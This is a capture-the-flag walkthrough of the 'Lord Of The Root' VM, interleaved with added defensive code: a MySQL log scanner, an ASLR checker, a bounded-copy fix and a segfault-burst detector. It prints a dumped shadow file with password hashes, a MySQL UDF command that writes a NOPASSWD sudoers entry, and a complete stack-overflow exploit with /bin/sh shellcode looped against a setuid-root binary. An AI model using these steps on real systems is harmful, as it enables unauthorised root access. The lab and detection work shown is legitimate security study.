root:$6$cQPCchYp$rWjOEHF47iuaGk/DQdkG6Dhhfm3.hTaNZPO4MoyBz2.bn44fERcQ23XCsp43LOt5NReEUjwDF8WDa5i1ML2jH.:16695:0:99999:7:::
daemon:*:16652:0:99999:7:::
bin:*:16652:0:99999:7:::
sys:*:16652:0:99999:7:::
sync:*:16652:0:99999:7:::
games:*:16652:0:99999:7:::
man:*:16652:0:99999:7:::
lp:*:16652:0:99999:7:::
mail:*:16652:0:99999:7:::
news:*:16652:0:99999:7:::
uucp:*:16652:0:99999:7:::
proxy:*:16652:0:99999:7:::
www-data:*:16652:0:99999:7:::
backup:*:16652:0:99999:7:::
list:*:16652:0:99999:7:::
irc:*:16652:0:99999:7:::
gnats:*:16652:0:99999:7:::
nobody:*:16652:0:99999:7:::
libuuid:!:16652:0:99999:7:::
syslog:*:16652:0:99999:7:::
messagebus:*:16652:0:99999:7:::
usbmux:*:16652:0:99999:7:::
dnsmasq:*:16652:0:99999:7:::
avahi-autoipd:*:16652:0:99999:7:::
kernoops:*:16652:0:99999:7:::
rtkit:*:16652:0:99999:7:::
saned:*:16652:0:99999:7:::
whoopsie:*:16652:0:99999:7:::
speech-dispatcher:!:16652:0:99999:7:::
avahi:*:16652:0:99999:7:::
lightdm:*:16652:0:99999:7:::
colord:*:16652:0:99999:7:::
hplip:*:16652:0:99999:7:::
pulse:*:16652:0:99999:7:::
smeagol:$6$vu8Pfezj$6ldY35ytL8yRd.Gp947FnW3t/WrMZXIL7sqTQS4wuSKeAiYeoYCy7yfS2rBpAPvFCPuo73phXmpOoLsg5REXz.:16695:0:99999:7:::
mysql:!:16695:0:99999:7:::
sshd:*:16696:0:99999:7:::

mysql> SELECT do_system('echo "smeagol ALL=NOPASSWD: ALL" >> /etc/sudoers');
+---------------------------------------------------------------+
| do_system('echo "smeagol ALL=NOPASSWD: ALL" >> /etc/sudoers') |
+---------------------------------------------------------------+
|                                                             0 |
+---------------------------------------------------------------+
1 row in set (0.00 sec)

mysql>
GAME OVER!
Since the MySQL daemon was running as root and our custom function runs commands as that same user, the quickest way to root was either to dump /etc/shadow and crack the root hash or to add the current user to the sudoers file. Both are shown above; the sudoers entry is what makes the sudo su below work.
smeagol@LordOfTheRoot:/tmp$ sudo su
root@LordOfTheRoot:/tmp# whoami
root
root@LordOfTheRoot:/tmp# cd /root
root@LordOfTheRoot:~# ls
buf  buf.c  Flag.txt  other  other.c  switcher.py
root@LordOfTheRoot:~# cat Flag.txt
“There is only one Lord of the Ring, only one who can bend it to his will. And he does not share power.” – Gandalf
root@LordOfTheRoot:~#
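Every step of the UDF technique used above leaves a distinctive statement in the MySQL query log, and how bad a UDF upload is depends on two configuration facts: which account mysqld runs as and whether secure_file_priv restricts LOAD_FILE()/INTO DUMPFILE. The following is an added example for the defending side, not code from the original write-up: it scans a constructed MySQL 5.5-style general_log excerpt (shaped after the statements above, with made-up connection ids and timestamps) for the three tell-tale statements, and checks the two posture items from a SHOW VARIABLES-style dict and the daemon's user. The log format and the variable names used are assumptions about a stock MySQL 5.5 install.

```python
import re

# Constructed MySQL 5.5-style general_log excerpt (not from the original post).
SAMPLE_GENERAL_LOG = "\n".join([
    "160115 19:40:01\t    5 Connect\troot@localhost on mysql",
    "160115 19:40:02\t    5 Query\tcreate table foo(line blob)",
    "160115 19:40:03\t    5 Query\tinsert into foo values(load_file('/tmp/raptor_udf2.so'))",
    "160115 19:40:05\t    5 Query\tselect * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so'",
    "160115 19:40:09\t    5 Query\tcreate function do_system returns integer soname 'raptor_udf2.so'",
    "160115 19:41:00\t    7 Query\tselect id, username from Users where id = 3",
    "160115 19:41:01\t    7 Quit\t",
])

# General-log entry: optional "YYMMDD HH:MM:SS", connection id, command, argument.
LOG_LINE = re.compile(r"^(?:\d{6}\s+\d\d:\d\d:\d\d)?\s*(?P<cid>\d+)\s+(?P<cmd>\w+)\s*(?P<arg>.*)$")

# Each rule: (name, pattern). The three steps of the UDF technique leave one
# of these in the query log whatever table or file names are used.
RULES = [
    ("LOAD_FILE", re.compile(r"\bload_file\s*\(", re.I)),
    ("INTO DUMPFILE/OUTFILE", re.compile(r"\binto\s+(?:dump|out)file\b", re.I)),
    ("CREATE FUNCTION ... SONAME",
     re.compile(r"\bcreate\s+(?:or\s+replace\s+)?(?:aggregate\s+)?function\b.*\bsoname\b", re.I)),
]


def scan_general_log(text):
    """Return [(connection id, rule name, statement)] for every Query entry
    that matches a rule, in log order."""
    findings = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if not m or m.group("cmd") != "Query":
            continue
        stmt = m.group("arg").strip()
        for name, pat in RULES:
            if pat.search(stmt):
                findings.append((int(m.group("cid")), name, stmt))
    return findings


def posture_findings(variables, mysqld_user):
    """Configuration checks that decide how far a UDF upload can go.
    `variables` is a dict of SHOW VARIABLES output (secure_file_priv and
    plugin_dir are used); `mysqld_user` is the account the daemon runs as."""
    issues = []
    if mysqld_user == "root":
        issues.append("mysqld runs as root: a UDF or INTO DUMPFILE acts with uid 0")
    sfp = variables.get("secure_file_priv", "")
    plugin_dir = variables.get("plugin_dir", "")
    if sfp == "":
        issues.append("secure_file_priv is empty: LOAD_FILE()/INTO DUMPFILE may use any path, including plugin_dir")
    elif sfp != "NULL" and plugin_dir.startswith(sfp):
        issues.append("secure_file_priv contains plugin_dir: INTO DUMPFILE can still drop a library where CREATE FUNCTION loads it")
    return issues


if __name__ == "__main__":
    for cid, rule, stmt in scan_general_log(SAMPLE_GENERAL_LOG):
        print(f"conn {cid}: {rule}: {stmt}")
    for issue in posture_findings({"secure_file_priv": "", "plugin_dir": "/usr/lib/mysql/plugin/"}, "root"):
        print("posture:", issue)
```

On the VM as described (daemon running as root, no file restrictions) both posture checks fire; with `user=mysql` and secure_file_priv set to NULL the UDF route is closed even with the DBA password in hand, which is the fix rather than rotating the password alone.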
GOING THE EXTRA MILE
# ssh smeagol@192.168.1.138
The authenticity of host '192.168.1.138 (192.168.1.138)' can't be established.
ECDSA key fingerprint is f3:cd:aa:1d:05:f2:1e:8c:61:87:25:b6:f4:34:45:37.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.1.138' (ECDSA) to the list of known hosts.

[ASCII-art banner]

Easy as 1,2,3
smeagol@192.168.1.138's password:
Welcome to Ubuntu 14.04.3 LTS (GNU/Linux 3.19.0-25-generic i686)

 * Documentation:  https://help.ubuntu.com/

261 packages can be updated.
128 updates are security updates.

[ASCII-art banner]

Last login: Tue Sep 22 12:59:38 2015 from 192.168.55.135
smeagol@LordOfTheRoot:~$ ls
Desktop  Documents  Downloads  examples.desktop  Music  Pictures  Public  Templates  Videos
smeagol@LordOfTheRoot:~$ cd ./
smeagol@LordOfTheRoot:~$ cd /
smeagol@LordOfTheRoot:/$ ls
bin  boot  cdrom  dev  etc  home  initrd.img  lib  lost+found  media  mnt  opt  proc  root  run  sbin  SECRET  srv  sys  tmp  usr  var  vmlinuz
smeagol@LordOfTheRoot:/$ cd SECRET
smeagol@LordOfTheRoot:/SECRET$ ls
door1  door2  door3
smeagol@LordOfTheRoot:/SECRET$ ls -lh
total 12K
drwxr-xr-x 2 root root 4.0K Jan 17 15:03 door1
drwxr-xr-x 2 root root 4.0K Jan 17 15:03 door2
drwxr-xr-x 2 root root 4.0K Jan 17 15:03 door3
smeagol@LordOfTheRoot:/SECRET$ cd door3
smeagol@LordOfTheRoot:/SECRET/door3$ ls
file
smeagol@LordOfTheRoot:/SECRET/door3$ ls -lh
total 8.0K
-rwsr-xr-x 1 root root 5.1K Sep 22 13:01 file
smeagol@LordOfTheRoot:/SECRET/door3$ ./file
Syntax: ./file <input string>
BUFFER OVERFLOW FUZZING
smeagol@LordOfTheRoot:/SECRET/door3$ ls
file
smeagol@LordOfTheRoot:/SECRET/door3$ ./file `perl -e 'print "A"x2048'`
Segmentation fault (core dumped)
smeagol@LordOfTheRoot:/SECRET/door3$ ./file `perl -e 'print "A"x200'`
Segmentation fault (core dumped)
smeagol@LordOfTheRoot:/SECRET/door3$ ./file `perl -e 'print "A"x150'`
smeagol@LordOfTheRoot:/SECRET/door3$ ./file `perl -e 'print "A"x170'`
smeagol@LordOfTheRoot:/SECRET/door3$ ./file `perl -e 'print "A"x171'`
Illegal instruction (core dumped)
FINDING THE OFFSET
# /usr/share/metasploit-framework/tools/exploit/pattern_create.rb 1024
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0B
# /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb 41376641
[*] Exact match at offset 171
# /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb 36664135
[*] Exact match at offset 167
#
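The two pattern_offset.rb lookups above work because the cyclic pattern has no repeated 4-byte window, and because the value read out of a 32-bit register is the overwriting bytes in reverse (x86 is little-endian). The following is an added example re-implementing that pattern and the offset lookup in Python; it is not the Metasploit code. It reproduces the two offsets found above from the register values as gdb printed them, and checks the uniqueness property that makes the answer unambiguous. Which register 0x36664135 came from is not stated in the post; an offset of 167, four bytes below the return address at 171, is where the saved EBP sits, so the comment below treats it as such.

```python
import string

# Re-implementation (added example) of the cyclic pattern used by
# pattern_create.rb / pattern_offset.rb: a stream of 3-byte chunks
# <Upper><lower><digit> in order, Aa0 Aa1 ... Aa9 Ab0 ... Zz9.


def pattern_create(length):
    """Return the first `length` bytes of the cyclic pattern as a str."""
    chunks = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                chunks.append(upper + lower + digit)
                if len(chunks) * 3 >= length:
                    return "".join(chunks)[:length]
    raise ValueError("pattern longer than 20280 bytes would repeat")


def pattern_offset(register_value, length=1024):
    """Given a crashed register as an integer (e.g. 0x41376641 from gdb),
    recover the 4 pattern bytes that overwrote it and return their offset in
    the pattern, or -1 if they are not in it. x86 is little-endian, so the
    register value is the overwriting substring reversed byte-wise."""
    needle = register_value.to_bytes(4, "little").decode("latin-1")
    return pattern_create(length).find(needle)


def windows_unique(pattern, n=4):
    """True if no n-byte window repeats inside `pattern`; this is what makes
    the offset lookup unambiguous for a pattern of this length."""
    seen = set()
    for i in range(len(pattern) - n + 1):
        w = pattern[i:i + n]
        if w in seen:
            return False
        seen.add(w)
    return True


if __name__ == "__main__":
    pat = pattern_create(1024)
    print(pat[:30] + "...")
    print("4-byte windows unique:", windows_unique(pat))
    print("EIP 0x41376641 -> offset", pattern_offset(0x41376641))        # 171
    print("saved EBP 0x36664135 -> offset", pattern_offset(0x36664135))  # 167 (assumed EBP)
    print("0x42424242 -> offset", pattern_offset(0x42424242))            # -1, not pattern bytes
```

The 171 matches the fuzzing result above, where 170 bytes ran clean and 171 crashed, and it is the count of "A"s used in the gdb run that lands 0x42424242 in EIP.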
CHECKING FOR ASLR
[email protected]:/SECRET/door1$ ls
file
[email protected]:/SECRET/door1$ ldd file
	linux-gate.so.1 =>  (0xb77b9000)
	libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb75f2000)
	/lib/ld-linux.so.2 (0xb77bb000)
[email protected]:/SECRET/door1$ ldd file
	linux-gate.so.1 =>  (0xb7708000)
	libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7541000)
	/lib/ld-linux.so.2 (0xb770a000)
[email protected]:/SECRET/door1$ ldd file
	linux-gate.so.1 =>  (0xb7740000)
	libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7579000)
	/lib/ld-linux.so.2 (0xb7742000)
[email protected]:/SECRET/door1$ ldd file
	linux-gate.so.1 =>  (0xb773b000)
	libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7574000)
	/lib/ld-linux.so.2 (0xb773d000)
[email protected]:/SECRET/door1$ ldd file
	linux-gate.so.1 =>  (0xb7783000)
	libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb75bc000)
	/lib/ld-linux.so.2 (0xb7785000)
[email protected]:/SECRET/door1$ ldd file
	linux-gate.so.1 =>  (0xb7764000)
	libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb759d000)
	/lib/ld-linux.so.2 (0xb7766000)
[email protected]:/SECRET/door1$
[email protected]:/tmp$ cat test.c
#include <stdio.h>

int main() {
    int a;
    printf("%p\n", &a);   /* address of a stack variable: changes per run if ASLR is on */
    return 0;
}
[email protected]:/tmp$ ls
exploit.poy  exploit.py  test.c
[email protected]:/tmp$ gcc test.c -o test
[email protected]:/tmp$ ./test
0xbfc0ad2c
[email protected]:/tmp$ ./test
0xbfa93a1c
[email protected]:/tmp$ ./test
0xbff82e3c
The libc base and the stack address move on every run, so ASLR is enabled on the target; a hard-coded return address will only hit some of the time, which is why the exploit is wrapped in a loop with a large NOP sled.
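Running ldd and a tiny stack-address printer a few times by hand is exactly the right check; as an added example (not code from the write-up or from the VM), here is that check automated in C. Run with --probe it prints a stack address like test.c does; run with no arguments it re-executes itself several times through popen, counts the distinct addresses it got back, and also reads the kernel's /proc/sys/kernel/randomize_va_space knob. The function names are mine; the three sample addresses used in the test are the ones printed on this page.

```c
#define _POSIX_C_SOURCE 200809L   /* for popen/pclose */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Parse "0x..." address samples (one per run) and return how many distinct
 * values occur.  With ASLR off every run prints the same stack address. */
int count_distinct_addrs(const char *const *samples, size_t n)
{
    unsigned long long seen[256];
    size_t nseen = 0;
    if (n > 256) n = 256;                       /* bound the scratch table */
    for (size_t i = 0; i < n; i++) {
        unsigned long long v = strtoull(samples[i], NULL, 16);
        size_t j;
        for (j = 0; j < nseen; j++)
            if (seen[j] == v) break;
        if (j == nseen) seen[nseen++] = v;      /* first time we see this value */
    }
    return (int)nseen;
}

/* Needs at least two runs to say anything; more than one distinct
 * address means the stack base is being randomised. */
int aslr_looks_active(const char *const *samples, size_t n)
{
    return n >= 2 && count_distinct_addrs(samples, n) > 1;
}

/* Linux sysctl: 0 = off, 1 = stack/mmap/vdso randomised, 2 = brk as well.
 * Returns -1 when the file cannot be read (non-Linux, restricted /proc). */
int read_randomize_va_space(void)
{
    FILE *f = fopen("/proc/sys/kernel/randomize_va_space", "r");
    int v = -1;
    if (f) {
        if (fscanf(f, "%d", &v) != 1) v = -1;
        fclose(f);
    }
    return v;
}

int main(int argc, char **argv)
{
    if (argc > 1 && strcmp(argv[1], "--probe") == 0) {
        int local;                              /* same idea as test.c above */
        printf("%p\n", (void *)&local);
        return 0;
    }
    enum { RUNS = 8 };
    char buf[RUNS][32];
    const char *ptrs[RUNS];
    char cmd[512];
    size_t got = 0;
    snprintf(cmd, sizeof cmd, "%s --probe", argv[0]);   /* re-run ourselves */
    for (int i = 0; i < RUNS; i++) {
        FILE *p = popen(cmd, "r");
        if (!p) break;
        if (fgets(buf[got], sizeof buf[got], p)) {
            ptrs[got] = buf[got];
            got++;
        }
        pclose(p);
    }
    printf("randomize_va_space = %d\n", read_randomize_va_space());
    printf("%zu runs, %d distinct stack addresses -> ASLR %s\n",
           got, count_distinct_addrs(ptrs, got),
           aslr_looks_active(ptrs, got) ? "appears active" : "appears OFF");
    return 0;
}
```

The sysctl value and the empirical sample should agree; if randomize_va_space reads 2 but every run prints the same address, the binary itself is the odd one out (for example a non-PIE executable has a fixed image base even though its stack and libraries move, which is what the ldd output above shows for this target's libc).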
DEBUGGING
[email protected]:/SECRET/door3$ gdb -q ./file
Reading symbols from ./file...(no debugging symbols found)...done.
(gdb) r `perl -e 'print "A"x171, "B"x4, "C"x2000'`
Starting program: /SECRET/door3/file `perl -e 'print "A"x171, "B"x4, "C"x2000'`

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb) disass main
Dump of assembler code for function main:
   0x0804845d <+0>:     push   %ebp
   0x0804845e <+1>:     mov    %esp,%ebp
   0x08048460 <+3>:     and    $0xfffffff0,%esp
   0x08048463 <+6>:     sub    $0xb0,%esp
   0x08048469 <+12>:    cmpl   $0x1,0x8(%ebp)
   0x0804846d <+16>:    jg     0x8048490 <main+51>
   0x0804846f <+18>:    mov    0xc(%ebp),%eax
   0x08048472 <+21>:    mov    (%eax),%eax
   0x08048474 <+23>:    mov    %eax,0x4(%esp)
   0x08048478 <+27>:    movl   $0x8048540,(%esp)
   0x0804847f <+34>:    call   0x8048310 <printf@plt>
   0x08048484 <+39>:    movl   $0x0,(%esp)
   0x0804848b <+46>:    call   0x8048340 <exit@plt>
   0x08048490 <+51>:    mov    0xc(%ebp),%eax
   0x08048493 <+54>:    add    $0x4,%eax
   0x08048496 <+57>:    mov    (%eax),%eax
   0x08048498 <+59>:    mov    %eax,0x4(%esp)
   0x0804849c <+63>:    lea    0x11(%esp),%eax
   0x080484a0 <+67>:    mov    %eax,(%esp)
   0x080484a3 <+70>:    call   0x8048320 <strcpy@plt>
   0x080484a8 <+75>:    mov    $0x0,%eax
   0x080484ad <+80>:    leave
   0x080484ae <+81>:    ret
End of assembler dump.
(gdb) info reg
eax            0x0	0
ecx            0xbfe311f0	-1075637776
edx            0xbfe2fb28	-1075643608
ebx            0xb76e2000	-1217519616
esp            0xbfe2f360	0xbfe2f360
ebp            0x41414141	0x41414141
esi            0x0	0
edi            0x0	0
eip            0x42424242	0x42424242
eflags         0x10202	[ IF RF ]
cs             0x73	115
ss             0x7b	123
ds             0x7b	123
es             0x7b	123
fs             0x0	0
gs             0x33	51
(gdb)
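What the disassembly shows is the whole bug: main() copies argv[1] into a fixed stack buffer (lea 0x11(%esp)) with an unbounded string copy, in a root-owned setuid binary, so 171 bytes of input reach the saved return address and EBP/EIP end up holding attacker bytes. As an added example (the VM's source is not on this page, so this is a reconstruction, not the author's code), here is that pattern in C next to a hardened version that refuses input which does not fit. The buffer size of 159 is an assumption inferred from the frame layout (0xb0-byte frame, buffer at esp+0x11); the function names are mine.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed size: inferred from "sub $0xb0,%esp" and "lea 0x11(%esp)" in the
 * disassembly; the real constant is not on the page. */
#define BUF_SIZE 159

/* Vulnerable form, reconstructed from the disassembly: strcpy() has no idea
 * how large dst is, so anything longer than BUF_SIZE-1 bytes runs past the
 * buffer into the saved EBP and return address.  Kept for comparison only;
 * the checks below never call it. */
void vulnerable_copy(char *dst, const char *src)
{
    strcpy(dst, src);
}

/* Hardened form: scan at most dst_size bytes for the terminator and reject
 * the input if none is found, so the copy (NUL included) always fits.
 * Returns 0 on success, -1 when src would not fit. */
int copy_arg_checked(char *dst, size_t dst_size, const char *src)
{
    size_t i;
    for (i = 0; i < dst_size; i++)
        if (src[i] == '\0') break;
    if (i == dst_size)
        return -1;                 /* no NUL within the buffer: too long */
    memcpy(dst, src, i + 1);       /* copies the terminator as well */
    return 0;
}

/* Same control flow as the target's main(), with the bounded copy.
 * Returns 0 when the argument was accepted, 1 on a usage error,
 * 2 when the argument was rejected as too long. */
int hardened_main(int argc, char **argv)
{
    char buf[BUF_SIZE];
    if (argc < 2) {
        printf("Syntax: %s <input string>\n", argv[0]);
        return 1;
    }
    if (copy_arg_checked(buf, sizeof buf, argv[1]) != 0) {
        fprintf(stderr, "input too long (max %zu bytes)\n", sizeof buf - 1);
        return 2;
    }
    printf("accepted %zu bytes\n", strlen(buf));
    return 0;
}

int main(int argc, char **argv)
{
    return hardened_main(argc, argv);
}
```

Two compile-time defences would also have blunted this binary even with the strcpy() left in: -fstack-protector-strong places a canary between the buffer and the saved return address so the overwrite aborts the process instead of returning into the sled, and -D_FORTIFY_SOURCE=2 with optimisation turns this strcpy() into a checked variant because the destination size is known at compile time. Neither is a substitute for the bounds check, and a setuid-root helper that takes untrusted argv is exactly the place to insist on all three.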
FINDING A GOOD PLACE FOR OUR RETURN ADDRESS
(gdb) r `perl -e 'print "A"x171, "B"x4, "\x90"x4000'`
(gdb) x/2500x $esp
0xbf92eaf0:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92eb00:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92eb10:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92eb20:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92eb30:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92eb40:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92eb50:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92eb60:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92eb70:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92eb80:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92eb90:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92eba0:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92ebb0:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92ebc0:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92ebd0:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92ebe0:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92ebf0:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92ec00:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92ec10:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92ec20:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92ec30:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92ec40:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92ec50:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92ec60:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92ec70:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92ec80:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92ec90:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92eca0:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92ecb0:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92ecc0:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92ecd0:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92ece0:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92ecf0:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92ed00:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92ed10:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92ed20:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92ed30:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92ed40:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92ed50:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92ed60:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92ed70:	0x90909090	0x90909090	0x90909090	0x90909090
CONSTRUCTING OUR BUFFER
JUMP ADDRESS  = 0xbf92eb80
LITTLE ENDIAN = \x80\xeb\x92\xbf

OFFSET    = 171
JMP       = \x80\xeb\x92\xbf
NOOP      = \x90*2000
SHELLCODE = \x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\x6a\x0b\x58\xcd\x80

BUFFER = OFFSET + JMP + NOOP + SHELLCODE
EXPLOITATION
[email protected]:/SECRET/door3$ for a in {1..1000}; do ./file `perl -e 'print "A"x171, "\x80\xeb\x92\xbf", "\x90"x2000', "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\x6a\x0b\x58\xcd\x80"`; done;
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
# whoami
root
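From the defender's side, that loop is noisy: every miss is a SIGSEGV of the same setuid-root binary within the same few seconds, and the kernel logs each one to dmesg/syslog as "comm[pid]: segfault at ADDR ip IP sp SP error CODE". A burst of those for one program, especially with ip equal to the faulting address and an error code whose instruction-fetch bit (0x10) is set, is the signature of a return address being guessed. As an added detection example, not part of the original write-up, this C scanner counts such lines per program name over a constructed log excerpt and flags a burst. The hostname, PIDs and timestamps in the sample are constructed; the addresses are the ones from the crashes shown on this page, and the function names are mine.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Constructed sample of kernel segfault messages as they appear in syslog.
 * The first four mimic repeated attempts against the setuid "file" binary;
 * the fifth is an ordinary user-space crash (error 4: user-mode read). */
static const char SAMPLE_LOG[] =
    "Jan 17 15:10:01 host kernel: [  812.101] file[2301]: segfault at 42424242 ip 42424242 sp bfe2f360 error 14\n"
    "Jan 17 15:10:01 host kernel: [  812.134] file[2302]: segfault at bf92eb80 ip bf92eb80 sp bfa11d20 error 14\n"
    "Jan 17 15:10:01 host kernel: [  812.160] file[2303]: segfault at bf92eb80 ip bf92eb80 sp bfcc0e40 error 14\n"
    "Jan 17 15:10:02 host kernel: [  812.190] file[2304]: segfault at bf92eb80 ip bf92eb80 sp bfe70a10 error 14\n"
    "Jan 17 15:10:05 host kernel: [  815.002] firefox[1890]: segfault at 0 ip b75a1c2d sp bfd1a2c0 error 4 in libc.so.6[b7530000+1a5000]\n"
    "Jan 17 15:10:06 host sshd[2401]: Accepted password for user from 192.168.1.50 port 51234 ssh2\n";

struct segfault_stats {
    int total;        /* segfault lines belonging to the named program */
    int exec_faults;  /* of those, faults raised while fetching an instruction */
};

/* x86 page-fault error code (printed in hex): bit 2 = user mode,
 * bit 4 = instruction fetch.  "error 14" is a user-mode jump to an
 * address the process may not execute from. */
static int is_exec_fault(unsigned long err)
{
    return (err & 0x10) != 0;
}

/* Walk the log line by line and collect segfault lines for program comm. */
struct segfault_stats scan_segfaults(const char *log, const char *comm)
{
    struct segfault_stats st = {0, 0};
    char needle[64];
    snprintf(needle, sizeof needle, " %s[", comm);   /* " file[" : comm followed by its pid */

    const char *line = log;
    while (*line) {
        const char *nl = strchr(line, '\n');
        size_t len = nl ? (size_t)(nl - line) : strlen(line);
        const char *seg = strstr(line, "segfault at");
        const char *who = strstr(line, needle);
        /* both markers must sit on this line, program name before the message */
        if (seg && who && seg < line + len && who < seg) {
            unsigned long addr, ip, sp, err;
            if (sscanf(seg, "segfault at %lx ip %lx sp %lx error %lx",
                       &addr, &ip, &sp, &err) == 4) {
                st.total++;
                if (is_exec_fault(err)) st.exec_faults++;
            }
        }
        line = nl ? nl + 1 : line + len;
    }
    return st;
}

/* Alert helper: 1 when comm crashed at least threshold times in the buffer. */
int segfault_burst(const char *log, const char *comm, int threshold)
{
    return scan_segfaults(log, comm).total >= threshold;
}

int main(int argc, char **argv)
{
    const char *comm = argc > 1 ? argv[1] : "file";
    struct segfault_stats s = scan_segfaults(SAMPLE_LOG, comm);
    printf("%s: %d segfaults, %d on instruction fetch, burst=%s\n",
           comm, s.total, s.exec_faults,
           segfault_burst(SAMPLE_LOG, comm, 3) ? "yes" : "no");
    return 0;
}
```

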